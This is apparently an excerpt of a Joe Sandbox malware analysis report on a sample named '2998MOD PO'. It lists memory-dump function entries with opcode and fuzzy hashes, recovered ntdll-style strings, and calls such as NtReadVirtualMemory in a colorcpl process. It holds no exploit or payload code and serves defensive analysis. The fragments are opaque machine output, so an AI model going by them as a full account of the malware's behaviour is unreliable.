                          • Opcode ID: 2c1953deb421477a131fadca0b0299fcdd56621531b04321ac96fb119dd99cca
                          • Instruction ID: 112d71d5c833dfdc2ea08151aed440113bec682bb8ac733eba433a93957f05f0
                          • Opcode Fuzzy Hash: 2c1953deb421477a131fadca0b0299fcdd56621531b04321ac96fb119dd99cca
                          • Instruction Fuzzy Hash: 4B90043530151403D100715C550C707405DD7D0301F55D411F047455CFD757CD517333
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ef947f9c675ffab374824cabfc6c276f72d2f589ee64615750835b57b45a1f6c
                          • Instruction ID: c25aa850260fe5603b4e0def659b6ca01298c05e4ac714035f1fd1f797d02abb
                          • Opcode Fuzzy Hash: ef947f9c675ffab374824cabfc6c276f72d2f589ee64615750835b57b45a1f6c
                          • Instruction Fuzzy Hash: DE90023520151842D10071584408B46405997E0301F55C016E0164654EC615C9517622
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bf6fc482c48ab9feceb91626749b97837aefa064bd72302f43203b3138fd988d
                          • Instruction ID: 23bbade60665398ba30cb428d171fd7fcde5b02bc357c42c220a8505eb8e8c6e
                          • Opcode Fuzzy Hash: bf6fc482c48ab9feceb91626749b97837aefa064bd72302f43203b3138fd988d
                          • Instruction Fuzzy Hash: 5790023520191402D1007158481870B405997D0302F55C011E11A4555EC62589516672
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b43c380fb6e74ff50d9a5d2ca6ed244e99d88d8b3517fde198a777e50cee11fd
                          • Instruction ID: a52d43c7e73b87aa36572a956ef7e69bea20b09b6fadb015ffdd9f0e96494ab5
                          • Opcode Fuzzy Hash: b43c380fb6e74ff50d9a5d2ca6ed244e99d88d8b3517fde198a777e50cee11fd
                          • Instruction Fuzzy Hash: 44900225601510424140716888489068059BBE1211755C121E09D8550EC55989655766
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b60c22fabcb0cfe1d233a7a3b11979ccdd9b12ed0c62ca0ff38a7358d09b3a7a
                          • Instruction ID: 650a5bf164c59d3c5321ac3618841dfe4394b90cd311526ff5a30eb4719dc052
                          • Opcode Fuzzy Hash: b60c22fabcb0cfe1d233a7a3b11979ccdd9b12ed0c62ca0ff38a7358d09b3a7a
                          • Instruction Fuzzy Hash: 8690023520191402D1007158480C747405997D0302F55C011E51A4555FC665C9916632
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2f52e41b466f3e322fda6fe3e862f4b841ab19449f39bc2bc1ea514934d20c6c
                          • Instruction ID: 6b24b3112f6e123acd5ecb712ba7c6322ea9076fe4d0ab7007f50286b2e5fad7
                          • Opcode Fuzzy Hash: 2f52e41b466f3e322fda6fe3e862f4b841ab19449f39bc2bc1ea514934d20c6c
                          • Instruction Fuzzy Hash: DF900225211D1042D20075684C18B07405997D0303F55C115E0194554DC91589615622
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 32333cf07eeee60f74a8f2657bc1eb1e0db212e3ddea021665058ea99ca05337
                          • Instruction ID: f68a40978dcd88bb94e3d8068f94fdf4614aeeb4cbefcc0055a4b063f73bb09a
                          • Opcode Fuzzy Hash: 32333cf07eeee60f74a8f2657bc1eb1e0db212e3ddea021665058ea99ca05337
                          • Instruction Fuzzy Hash: 9B90026534151442D10071584418B064059D7E1301F55C015E10A4554EC619CD526227
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ea180939a65dd7d020975ea1230f6670ce9b8f659efcde165be2e302ca254570
                          • Instruction ID: b857f34c96f8514ac7fa7d2dc77e793c59e67417b3e981f3a4edc942b1719e5a
                          • Opcode Fuzzy Hash: ea180939a65dd7d020975ea1230f6670ce9b8f659efcde165be2e302ca254570
                          • Instruction Fuzzy Hash: 3390026521151042D10471584408706409997E1201F55C012E2194554DC5298D615226
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 31b6adc3ef4bd48374f8a2e72e2a0cfde07ab62e17489f6f687bce0c04133aae
                          • Instruction ID: fe050fb4e6ee3e9668c02118a07029c41cc0fbb5b04d6b58b1696cb384ea8cd8
                          • Opcode Fuzzy Hash: 31b6adc3ef4bd48374f8a2e72e2a0cfde07ab62e17489f6f687bce0c04133aae
                          • Instruction Fuzzy Hash: 0C90022560151502D10171584408616405E97D0241F95C022E1064555FCA258A92A232
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 73752fbdf876ef544cb49b37d239347306db81591ab95d0fe4431274761d6fb7
                          • Instruction ID: d26677654e941c34f8a3129b81e81f4dac6f4605a6e62d8e4b7d51b1a54c88f1
                          • Opcode Fuzzy Hash: 73752fbdf876ef544cb49b37d239347306db81591ab95d0fe4431274761d6fb7
                          • Instruction Fuzzy Hash: F590027520151402D14071584408746405997D0301F55C011E50A4554FC6598ED56766
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 88408605106e70ea55c2bbb6cf8754d8bd8aaf3d0058e5aecfb1afd914cd21c5
                          • Instruction ID: e1a6c7c6c6bfa9ea053dd2f4d49f5948f0046de960fe82953ac29fd9a51dc3ea
                          • Opcode Fuzzy Hash: 88408605106e70ea55c2bbb6cf8754d8bd8aaf3d0058e5aecfb1afd914cd21c5
                          • Instruction Fuzzy Hash: 1690026520191403D14075584808607405997D0302F55C011E20A4555FCA298D516236
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f2160912a8d8bef4f69023aff85e5bf09481a3a3958778658d99e92f201dea2f
                          • Instruction ID: 2c32f3c631173e29b53e2c23301e06e90e0e535c71c9251b74d58e31216b1d62
                          • Opcode Fuzzy Hash: f2160912a8d8bef4f69023aff85e5bf09481a3a3958778658d99e92f201dea2f
                          • Instruction Fuzzy Hash: 0690022530151402D10271584418606405DD7D1345F95C012E1464555EC6258A53A233
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0b7d72839a5c2fc0535c0e914e035c7bf8534eb3b7b5b31eed9e09860598edd7
                          • Instruction ID: 5125b18f8fe32a276a3863284ef92b59ace79d00b7977cb8957a332c4f65f0ca
                          • Opcode Fuzzy Hash: 0b7d72839a5c2fc0535c0e914e035c7bf8534eb3b7b5b31eed9e09860598edd7
                          • Instruction Fuzzy Hash: 5F90022524151802D14071588418707405AD7D0601F55C011E0064554EC6168A6567B2
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d122bebbcd60077cfe7433b5d7e9d9c2a1a8a0f4fc149aa7f14a9d0c74645ae
                          • Instruction ID: 3be8a13b67110459d607d2fc15095be7da53f6c51c7697235fdc50e574b61ea4
                          • Opcode Fuzzy Hash: 2d122bebbcd60077cfe7433b5d7e9d9c2a1a8a0f4fc149aa7f14a9d0c74645ae
                          • Instruction Fuzzy Hash: 8690022520195442D14072584808B0F815997E1202F95C019E4196554DC91589555722
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 953463aa8426ab639d947011d556c450230c414061c132c9c34230c439d2c9ca
                          • Instruction ID: 19b9136d76d12f329b399170e486cd8b66f0ef78befdfd42b99a50e0b6501116
                          • Opcode Fuzzy Hash: 953463aa8426ab639d947011d556c450230c414061c132c9c34230c439d2c9ca
                          • Instruction Fuzzy Hash: FA90022524556102D150715C44086168059B7E0201F55C021E0854594EC55589556322
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9a5271f6422a9d94af58dbaa6213cd41ad1c01b50796aab968106f36c57b835a
                          • Instruction ID: 01fdd57595e83267e69f51b90bff95307d1789cdac22f672514e2e6832691dfb
                          • Opcode Fuzzy Hash: 9a5271f6422a9d94af58dbaa6213cd41ad1c01b50796aab968106f36c57b835a
                          • Instruction Fuzzy Hash: C990023520251142954072585808A4E815997E1302B95D415E0055554DC91489615322
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 896f4235c17a9b0b065a49fba3298da3a0f7ce7bc24b774b078c3c55ebeaa7fc
                          • Instruction ID: 5862521e1e696b6547f30c069e261b9582636753c802726e28f66ac63d0e35d8
                          • Opcode Fuzzy Hash: 896f4235c17a9b0b065a49fba3298da3a0f7ce7bc24b774b078c3c55ebeaa7fc
                          • Instruction Fuzzy Hash: F890023920151402D51071585808646409A97D0301F55D411E0464558EC65489A1A222
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                          • Instruction ID: 43c683df09aab794adfa1a4cb48f3dea64bd3df98f4f26d5149249ec5ab77c83
                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                          • Instruction Fuzzy Hash:
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          • Opcode ID: 750b29e9f796593513e87181a2ef6e481d7003ff89699457f0d3a34adc6f25e7
                          • Instruction ID: 88b81df4f083abb3a59027d6bce9cf9f09ca10dfc85352901496947e2cfd0788
                          • Opcode Fuzzy Hash: 750b29e9f796593513e87181a2ef6e481d7003ff89699457f0d3a34adc6f25e7
                          • Instruction Fuzzy Hash: A751D5B6A00116BFDB11DF9CC99097EFBB8BB48641B14C12DE5ADD7642D334DE4087A1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          • Opcode ID: 412fabc5fd88aa06171e8c8381db3097629ab641ebbd460282b8a06aeadb5dbe
                          • Instruction ID: 6d7c355f271fbb55c870e50670343388c1e47359b26237fb9defcf8c56ca5680
                          • Opcode Fuzzy Hash: 412fabc5fd88aa06171e8c8381db3097629ab641ebbd460282b8a06aeadb5dbe
                          • Instruction Fuzzy Hash: B051C675A00645AEDB30DF6DC890B7EB7F9EFC4200B44846AF59AD7682D674EB408760
                          Strings
                          • Execute=1, xrefs: 019F4713
                          • ExecuteOptions, xrefs: 019F46A0
                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 019F4742
                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 019F4725
                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019F46FC
                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 019F4655
                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 019F4787
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                          • API String ID: 0-484625025
                          • Opcode ID: ff31e65fd3fde41987eeb40892b9208fe3cc532ce089db043e452eae360bcf5d
                          • Instruction ID: 47048274a5cdbb71085f260ada55b99ffa0f97f27bf531e215e7e6fc89041843
                          • Opcode Fuzzy Hash: ff31e65fd3fde41987eeb40892b9208fe3cc532ce089db043e452eae360bcf5d
                          • Instruction Fuzzy Hash: 57512A31A00209BBEF25AAE8DDD5FEA77ACAF98705F0401ADD60DA71C0D7719A418F51
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-$0$0
                          • API String ID: 1302938615-699404926
                          • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                          • Instruction ID: b79bb41730009d6e01d013d65c12ee40121c3f794b83503849f32002282d8b69
                          • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                          • Instruction Fuzzy Hash: 8381D130E012498EEF258E6CC9527FEBBB9AF44BA1F18451DD8DAA7691C73489408B53
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$[$]:%u
                          • API String ID: 48624451-2819853543
                          • Opcode ID: 1061001805b15bfe0b21ed785cd8d0cf549c037d0afdf24c677fa59ba6df808d
                          • Instruction ID: 29d74b0174f0cd1429b1bddfd925a9e9079457d355e0e328b590e98ee0c5c06b
                          • Opcode Fuzzy Hash: 1061001805b15bfe0b21ed785cd8d0cf549c037d0afdf24c677fa59ba6df808d
                          • Instruction Fuzzy Hash: 0321337AE00219ABDB21DF69DD45BEEBBF8AF94654F44011AFA45D3200E7309A018BA1
                          Strings
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019F02BD
                          • RTL: Re-Waiting, xrefs: 019F031E
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019F02E7
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                          • API String ID: 0-2474120054
                          • Opcode ID: 8fe2342affef2c003bf74bc9cadcf95c8f399093a53056448347cd7dc02890af
                          • Instruction ID: 677dcfa0c51f10ecabb1c3bce3c072e1ee30d6c4e543997549c59f6141a64756
                          • Opcode Fuzzy Hash: 8fe2342affef2c003bf74bc9cadcf95c8f399093a53056448347cd7dc02890af
                          • Instruction Fuzzy Hash: 0EE1C0306047419FD725CF28C884B6ABBE9FF84314F540A1DF6A98B2D2D774D949CB92
                          Strings
                          • RTL: Resource at %p, xrefs: 019F7B8E
                          • RTL: Re-Waiting, xrefs: 019F7BAC
                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 019F7B7F
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 0-871070163
                          • Opcode ID: 2699cd45453befed7d32db18bd41f5751ce1fc174abd4d2cec5e848caca3e702
                          • Instruction ID: d3cb9b452140f0640487381e44fc6ddd1dbb88e42b9ac093ba2dc9d3d8f1970b
                          • Opcode Fuzzy Hash: 2699cd45453befed7d32db18bd41f5751ce1fc174abd4d2cec5e848caca3e702
                          • Instruction Fuzzy Hash: 2141E2317047069FD725DE29C980BAAB7E9EF89712F100A1DEA9E972C0DB31E4058B91
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019F728C
                          Strings
                          • RTL: Resource at %p, xrefs: 019F72A3
                          • RTL: Re-Waiting, xrefs: 019F72C1
                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 019F7294
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 885266447-605551621
                          • Opcode ID: a888906cd25324403ba86b47d495ca0e756f7dbb9de503bc915b9a22d564cb7b
                          • Instruction ID: 4cd878bf12a340f73a437c2286dd86f6b38fc3316dd55271c13fa47a76b36b13
                          • Opcode Fuzzy Hash: a888906cd25324403ba86b47d495ca0e756f7dbb9de503bc915b9a22d564cb7b
                          • Instruction Fuzzy Hash: FB410535700206AFD725DE69CD81FAAB7A5FB94B11F10061DFA5DA7280DB30F80187D1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$]:%u
                          • API String ID: 48624451-3050659472
                          • Opcode ID: 08d8b75e3fe844d5a6863b39d74966cc3a8e4ee48fe1ca8d3c3ad0edea444779
                          • Instruction ID: 51c7de5e13b80ad942da8c04dd988989c21c78d2ed55df0107fe6d9a038632a4
                          • Opcode Fuzzy Hash: 08d8b75e3fe844d5a6863b39d74966cc3a8e4ee48fe1ca8d3c3ad0edea444779
                          • Instruction Fuzzy Hash: 12317876A006199FDB20DF2DDC40BEE77F8EF94610F44455AF949E3240EB30AA458FA1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-
                          • API String ID: 1302938615-2137968064
                          • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                          • Instruction ID: d355c86e44232ad6e700b0e34ea7aedb8d74ec84295209b4a83760a71eb4fbca
                          • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                          • Instruction Fuzzy Hash: FF91A871E002179BDB28DFADC881ABE7BA9AF44B21F54451EE9DDE72D0D73099408F12
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: $$@
                          • API String ID: 0-1194432280
                          • Opcode ID: 029dde6fe45c6aa00350963ab254fa03b7c1f1cb707497ee9d0ac29dcdb44b11
                          • Instruction ID: e324a18db8258259025b44936df03bd34e3b36c1d39e75ea0d1eb3e0e936334f
                          • Opcode Fuzzy Hash: 029dde6fe45c6aa00350963ab254fa03b7c1f1cb707497ee9d0ac29dcdb44b11
                          • Instruction Fuzzy Hash: 2E811B75D002699BDB32DB54CC44BEEB7B8BB48714F0041EAAA1DB7640D7709E85CFA0

                          Execution Graph

                          Execution Coverage:0.5%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:29
                          Total number of Limit Nodes:1

                          Control-flow Graph
                          APIs
                          • NtQueryInformationProcess.NTDLL ref: 04B4F148
                          • NtReadVirtualMemory.NTDLL ref: 04B4F25C
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288786271.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4b40000_colorcpl.jbxd
                          Similarity
                          • API ID: InformationMemoryProcessQueryReadVirtual
                          • String ID: 0$Z6t\
                          • API String ID: 1498878907-740423683
                          • Opcode ID: 39ded49adacb4dc03804fb794de1f49505a5d0c8d49dd09b654f5c8ae226f251
                          • Instruction ID: 3bfd6635e0c260abf2d7cbd45952a54759e398a87d1bf98302a2616c7602f69a
                          • Opcode Fuzzy Hash: 39ded49adacb4dc03804fb794de1f49505a5d0c8d49dd09b654f5c8ae226f251
                          • Instruction Fuzzy Hash: D7125E70918A8C8FDF65EF68C8947EEB7E1FB98309F00466AD84AC7254DF35E2419B41
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 9338fff6bbab0d0121aca3bf17a1c3e09b3fbaca42df775423f75628c4a4574c
                          • Instruction ID: 75c4c8be30af3fd9eedae8b07f969f15484f8a7aa4588b17aed3189e42120532
                          • Opcode Fuzzy Hash: 9338fff6bbab0d0121aca3bf17a1c3e09b3fbaca42df775423f75628c4a4574c
                          • Instruction Fuzzy Hash: EB9002616019008262407158480450660159BE1305395C115B05557B4C8618D955A269
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 1081b15ea2fc32f21d7f43b7e77e204ed858f7daff02b037dc2a5b67d785a70d
                          • Instruction ID: 191f1f049571008351a4b4f970fd9caa928da620104a1f738bc2f5cc4a4faebc
                          • Opcode Fuzzy Hash: 1081b15ea2fc32f21d7f43b7e77e204ed858f7daff02b037dc2a5b67d785a70d
                          • Instruction Fuzzy Hash: B4900231605C0052B2407158488464640159BE0305B55C011F04257A8C8A14DA566361

                          Control-flow Graph
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: cad2d157d1e6751325728a876b3668651be609e39b53e6a139b29ad03fdbc03c
                          • Instruction ID: a67d49f40ae3f42f97ffba35c4a9def4120cb421ec5f41292fc8c4e6cc315b92
                          • Opcode Fuzzy Hash: cad2d157d1e6751325728a876b3668651be609e39b53e6a139b29ad03fdbc03c
                          • Instruction Fuzzy Hash: C990023120180442F2007598540874600158BE0305F55D011B50257A9EC665D9917131

                          Control-flow Graph
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
